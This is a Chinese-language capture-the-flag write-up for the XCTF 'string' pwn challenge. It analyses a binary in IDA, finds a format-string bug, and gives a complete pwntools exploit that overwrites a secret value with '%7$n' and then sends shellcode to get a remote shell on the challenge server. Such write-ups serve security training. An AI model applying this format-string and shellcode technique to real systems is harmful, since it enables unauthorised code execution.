攻防世界PWN
String的WP
基本的三步checksec,file,执行文件
这是一个64位文件,只有pIE没开。
由string这个题目猜测可能会是字符串漏洞
将下载好的附件扔进IDA里查看,点击main函数
main函数中找不到,那就在其他函数看一下。
点击 sub_400D72
要进入if条件中,输入的s的长度需小于12位
在sub_400BB9函数中看到了
printf前几句中存在%s与%ld,可以操作.
继续看下一个函数
(a1+4是指a1加4个字节,也就是一个整数类型所以这个就是a1[1])
之后发现巫师的分支有命令执行的语句,可以直接执行外部输入的命令,而条件是a1这个数组里面的第一个数字等于第二个数字,可以在main函数中发现a1就是V5就是V4,则a1[0]=68,a1[1]=85.
printf(“secret[0] is %x\n”, v5, a2);
printf(“secret[1] is %x\n”, v5 + 4);
main函数的这两句话中,表示出来a1[0]和a1[1]的地址。
所以我们可以通过格式化字符串漏洞,改写a1[0]的值.
然后再次运行程序,计算偏移量。
AAAA.15f9e723.0.15ecdf33.d.ffffff80.0.0.41414141.252e7825.2e78252eI hear it, I hear it…
得出偏移量是7
得出EXP
from pwn import *
#r = process("./文件名")
r = remote(‘111.200.241.244’,63157)
r.recvuntil(“secret[0] is “)
#使接收到的数据倒序并转化为16进制赋给a1_addr
a1_addr = int(r.recvuntil(”\n”)[:-1], 16)
print(a1_addr)
#进入 sub_400D72函数
r.recvuntil(“What should your character’s name be:\n”)
r.sendline(“wang”)
#进入sub_400A7D函数
r.recvuntil(“So, where you will go?east or up?:\n”)
r.sendline(“east”)
#进入sub_400BB9函数
r.recvuntil(“go into there(1), or leave(0)?:\n”)
r.sendline(“1”)
r.recvuntil("‘Give me an address’\n")
r.sendline(str(a1_addr))
r.recvuntil(“And, you wish is:\n”)
payload = ‘A’ * 85 + “%7$n”
r.sendline(payload)
shellcode = asm(shellcraft.sh())
r.sendline(shellcode)
r.interactive()
成功Get shell